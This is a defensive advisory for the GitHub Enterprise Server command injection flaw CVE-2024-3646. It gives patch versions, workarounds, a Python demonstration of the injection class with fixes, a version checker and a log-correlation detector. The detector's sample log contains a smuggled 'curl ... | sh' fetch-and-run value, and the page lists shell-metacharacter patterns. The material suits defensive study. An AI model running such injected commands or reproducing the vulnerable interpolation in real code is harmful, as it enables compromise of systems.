CVE-2024-3646

8.0 HIGH

📋 TL;DR

A command injection vulnerability in GitHub Enterprise Server allows an attacker who holds the editor role in the Management Console to execute arbitrary commands on the appliance and gain admin SSH access while configuring chat integration. It affects every GitHub Enterprise Server release before the fixed versions 3.9.13, 3.10.10, 3.11.8 and 3.12.2 (so 3.12.0 and 3.12.1 are affected, as are release lines older than 3.9, which received no fix). Exploitation requires authenticated access to the Management Console with editor privileges; no unauthenticated path is known.
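The page does not show GitHub's vulnerable code, so the following is an added illustration of the vulnerability class rather than the actual GHES defect: a configuration value (here a hypothetical chat channel name) spliced into a shell command string, next to the same operation done without a shell and with an allow-list on the value. The function names, the `echo` stand-in for the real configuration step, the channel format and the payload are all assumptions, not taken from the product.

```python
import re
import subprocess

# Constructed payload: a channel name with a second shell command appended.
PAYLOAD = "ops-alerts; echo INJECTED"

# Hypothetical allow-list for a chat channel name (assumed format, not GHES's).
CHANNEL_RE = re.compile(r"[A-Za-z0-9_-]{1,80}")


def run_vulnerable(channel: str) -> str:
    """Vulnerable pattern: the value is interpolated into a string that
    /bin/sh parses, so ';' terminates the intended command and the rest
    runs as the attacker's command. `echo` stands in for whatever the
    real configuration step would invoke."""
    cmd = f"echo notify-channel {channel}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv_only(channel: str) -> str:
    """First fix: pass the value as its own argv element. No shell is
    involved, so metacharacters are just bytes inside one argument."""
    return subprocess.run(
        ["echo", "notify-channel", channel], capture_output=True, text=True
    ).stdout


def run_hardened(channel: str) -> str:
    """Second fix, layered on the first: reject anything outside the
    expected format before it reaches any external command."""
    if not CHANNEL_RE.fullmatch(channel):
        raise ValueError(f"rejected channel value: {channel!r}")
    return run_argv_only(channel)


def hardened_rejects(channel: str) -> bool:
    """True if the hardened path refuses the value."""
    try:
        run_hardened(channel)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # vulnerable: two output lines, the second produced by the injected command
    print("vulnerable:", run_vulnerable(PAYLOAD).splitlines())
    # argv only: the payload is printed literally, never executed
    print("argv only :", run_argv_only(PAYLOAD).splitlines())
    # hardened: the value is rejected before any command runs
    print("hardened  :", hardened_rejects(PAYLOAD))
```

The argv form alone already defeats the injection; the allow-list is kept because a value that is later written into a config file or passed to another tool may meet a second interpreter, and refusing unexpected characters at the input boundary closes that door too.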

💻 Affected Systems

Products:
  • GitHub Enterprise Server
Versions: All versions before the fixed release of their line (3.9.13, 3.10.10, 3.11.8, 3.12.2), including 3.12.0 and 3.12.1; release lines older than 3.9 have no fix
Operating Systems: Linux (GitHub Enterprise Server appliance)
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability is present in default configurations when chat integration is configured via Management Console.

📦 What is this software?

GitHub Enterprise Server (GHES) is the self-hosted edition of GitHub, delivered as a virtual appliance that customers run in their own data centre or cloud account. The Management Console is the appliance's administrative web UI (served on port 8443, separate from the GitHub application itself) where settings such as authentication, TLS, storage and chat integration are configured. Management Console accounts are distinct from GitHub user accounts and carry either the root site administrator role or the editor role; administrative shell access to the appliance is a separate channel, SSH as the admin user on port 122.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the GitHub Enterprise Server instance with admin SSH access, allowing data exfiltration, code manipulation, and persistent backdoor installation.

🟠

Likely Case

Unauthorized admin access leading to repository manipulation, user account compromise, and potential lateral movement within the enterprise network.

🟢

If Mitigated

Limited impact due to restricted Management Console access and proper role-based access controls preventing editor role assignment to untrusted users.

🌐 Internet-Facing: MEDIUM - While the Management Console may be internet-accessible, exploitation requires specific editor role credentials.
🏢 Internal Only: HIGH - Internal attackers with legitimate editor access or compromised credentials can exploit this to gain admin privileges.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to Management Console with editor role. No public exploit code available at this time.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.9.13, 3.10.10, 3.11.8 or 3.12.2 (the fixed release for your release line)

Vendor Advisory: https://docs.github.com/en/enterprise-server/admin/release-notes

Restart Required: Yes

Instructions:

1. Back up your GitHub Enterprise Server instance (for example with GitHub Enterprise Server Backup Utilities, ghe-backup) and take a VM snapshot so you can roll back.
2. Download the patch release for your release line (3.9.13, 3.10.10, 3.11.8 or 3.12.2) from the GitHub Enterprise downloads site.
3. Follow GitHub's upgrade documentation for your version; a patch release within the same line is applied with ghe-upgrade from the administrative shell.
4. Restart the instance after the upgrade completes and confirm the reported version.

🔧 Temporary Workarounds

Restrict Management Console Access

Applies to: all affected versions

Limit Management Console access to trusted administrators and remove the editor role from every account that does not strictly need it; editor credentials are the precondition for this attack, so any compromised or unneeded editor account is an exploitation path.

Disable Chat Integration

Applies to: all affected versions

Remove or disable the chat integration configuration in the Management Console until you can patch; the injection occurs while that integration is being configured, so leaving it unconfigured removes the attack vector.

🧯 If You Can't Patch

  • Implement strict access controls for the Management Console (port 8443) and regularly audit which accounts hold the editor role.
  • Monitor administrative SSH (admin user, port 122) for logins from unexpected sources or with keys not in your inventory, and segment the network so the Management Console and admin SSH are reachable only from administrative networks.

🔍 How to Verify

Check if Vulnerable:

Check your GitHub Enterprise Server version via the Management Console or the administrative shell. You are vulnerable if the version is lower than the fixed release for your release line (3.9.13, 3.10.10, 3.11.8 or 3.12.2). Note that 3.12.0 and 3.12.1 are affected, and so is any release line older than 3.9, which received no fix.

Check Version:

ssh -p 122 admin@your-ghes-instance 'ghe-version' (administrative SSH listens on port 122), or check in Management Console under Support > Version

Verify Fix Applied:

After patching, verify that the reported version is 3.9.13, 3.10.10, 3.11.8, 3.12.2 or a later release in the same line. No public test payload exists, so the version comparison is the check. Because the impact of this vulnerability is admin SSH access, also review the SSH keys authorized for the admin user in the Management Console and remove any you did not add.
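The "below 3.12" shortcut is wrong for 3.12.0 and 3.12.1, so the version comparison has to be done per release line. The following added helper (not part of the page or of GitHub's tooling) takes the text printed by ghe-version, or any string containing an X.Y.Z version, and compares it against the fixed releases listed in this advisory. It assumes that release lines newer than 3.12 shipped after the fix and are not affected, and that lines older than 3.9 are affected because no fix was issued for them.

```python
import re
from typing import Dict, Tuple

Version = Tuple[int, int, int]

# Fixed releases from the advisory, keyed by release line (major, minor).
FIXED_IN: Dict[Tuple[int, int], Version] = {
    (3, 9): (3, 9, 13),
    (3, 10): (3, 10, 10),
    (3, 11): (3, 11, 8),
    (3, 12): (3, 12, 2),
}
OLDEST_FIXED_LINE = min(FIXED_IN)   # (3, 9): older lines never received a fix
NEWEST_FIXED_LINE = max(FIXED_IN)   # (3, 12): newer lines assumed to ship fixed


def parse_version(text: str) -> Version:
    """Extract X.Y.Z from free text such as the output of ghe-version."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no X.Y.Z version found in {text!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_vulnerable(text: str) -> bool:
    """True if the version is affected by CVE-2024-3646."""
    version = parse_version(text)
    line = version[:2]
    if line in FIXED_IN:
        return version < FIXED_IN[line]
    if line < OLDEST_FIXED_LINE:
        return True          # e.g. 3.8.x: affected, no fix available, upgrade the line
    return False             # assumption: lines after 3.12 were released with the fix


def required_upgrade(text: str) -> str:
    """Human-readable remediation for a given version string."""
    version = parse_version(text)
    if not is_vulnerable(text):
        return "not affected"
    line = version[:2]
    if line in FIXED_IN:
        return "upgrade to %d.%d.%d" % FIXED_IN[line]
    return "upgrade to a supported release line (%d.%d.%d or later)" % FIXED_IN[OLDEST_FIXED_LINE]


if __name__ == "__main__":
    # Constructed sample outputs, not captured from a real appliance.
    for sample in ("GitHub Enterprise Server 3.11.7", "3.12.1", "3.12.2", "3.8.20", "3.13.0"):
        print(f"{sample:35} vulnerable={is_vulnerable(sample)!s:5} {required_upgrade(sample)}")
```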

📡 Detection & Monitoring

Log Indicators:

  • Admin SSH logins (port 122) from source addresses that were recently using the Management Console, or authenticated with keys not in your inventory
  • Chat integration configuration changes in the Management Console followed shortly by an admin SSH login
  • Shell metacharacters (;, |, &, backticks, $( )) in chat integration configuration values recorded in Management Console logs

Network Indicators:

  • Unexpected SSH connections from GitHub Enterprise Server to internal systems
  • Anomalous outbound connections after chat integration changes

SIEM Query:

source="github-enterprise" AND ((event="ssh_login" AND user="admin") OR (event="management_console" AND action="chat_integration_update"))

The field names above are placeholders to map onto your own log source; without the outer parentheses the source filter would apply only to the SSH clause. The stronger signal is the sequence, a chat integration change followed within a short window by an admin SSH login, rather than either event alone.
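A query that matches either event will page on every routine admin login, so the useful detection joins the two in time. The following added example (not from the page, GitHub or any SIEM vendor) runs that correlation over constructed sample lines. The sshd lines use OpenSSH's real "Accepted publickey for ... from ..." wording; the Management Console lines use an assumed JSON shape with invented field names, because the appliance's actual log format is not given here and must be mapped from your own logs.

```python
import json
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample input, not captured from a real appliance.
MGMT_CONSOLE_LINES = [
    '{"ts":"2024-04-18T09:55:00Z","actor":"alice","role":"editor","action":"settings_view"}',
    '{"ts":"2024-04-18T10:00:05Z","actor":"bob","role":"editor","action":"chat_integration_update",'
    '"value":"ops-alerts; curl http://10.9.8.7/k.sh | sh"}',
    '{"ts":"2024-04-18T11:30:00Z","actor":"alice","role":"editor","action":"chat_integration_update",'
    '"value":"ops-alerts"}',
]
SSHD_LINES = [
    "2024-04-18T10:02:41Z ghes sshd[2201]: Accepted publickey for admin from 10.9.8.7 port 50122 ssh2: ED25519 SHA256:AAAAexamplekey",
    "2024-04-18T11:31:00Z ghes sshd[2850]: Failed publickey for admin from 10.0.0.9 port 50411 ssh2",
    "2024-04-18T15:00:00Z ghes sshd[3102]: Accepted publickey for admin from 10.0.0.5 port 50910 ssh2: ED25519 SHA256:BBBBexamplekey",
]

# Characters that let a value escape a shell-interpolated command.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# OpenSSH success line; the leading timestamp/host prefix is the assumed collector format.
SSH_ACCEPT = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)"
)


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def chat_integration_changes(lines: List[str]) -> List[Dict]:
    """Management Console events that touched chat integration, flagged
    when the submitted value carries shell metacharacters."""
    out = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("action") != "chat_integration_update":
            continue
        ev["ts"] = parse_ts(ev["ts"])
        ev["metachars"] = bool(SHELL_META.search(ev.get("value", "")))
        out.append(ev)
    return out


def admin_ssh_accepts(lines: List[str]) -> List[Dict]:
    """Successful sshd authentications for the admin user only."""
    out = []
    for line in lines:
        m = SSH_ACCEPT.match(line)
        if m and m.group("user") == "admin":
            out.append({"ts": parse_ts(m.group("ts")), "ip": m.group("ip"), "method": m.group("method")})
    return out


def correlate(console_lines: List[str], sshd_lines: List[str],
              window: timedelta = timedelta(hours=1)) -> List[Dict]:
    """Alert when a chat integration change is followed within `window` by
    an admin SSH login; rate it high if the value looked like an injection."""
    alerts = []
    logins = admin_ssh_accepts(sshd_lines)
    for change in chat_integration_changes(console_lines):
        for login in logins:
            if change["ts"] <= login["ts"] <= change["ts"] + window:
                alerts.append({
                    "actor": change["actor"],
                    "change_ts": change["ts"].isoformat(),
                    "login_ts": login["ts"].isoformat(),
                    "login_ip": login["ip"],
                    "severity": "high" if change["metachars"] else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(MGMT_CONSOLE_LINES, SSHD_LINES):
        print(json.dumps(alert))
```

On the sample data only bob's change fires: the value contains a `;` and an admin login from the same address follows two minutes later. Alice's clean change at 11:30 is followed only by a failed login and, hours later, a routine admin session outside the window, so it produces nothing. In production, feed the console stream from your Management Console log forwarder and the sshd stream from the appliance's system auth log, and tune the window to how quickly your administrators normally act after a configuration change.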

🔗 References

  • GitHub Enterprise Server release notes: https://docs.github.com/en/enterprise-server/admin/release-notes
  • NVD entry for CVE-2024-3646: https://nvd.nist.gov/vuln/detail/CVE-2024-3646
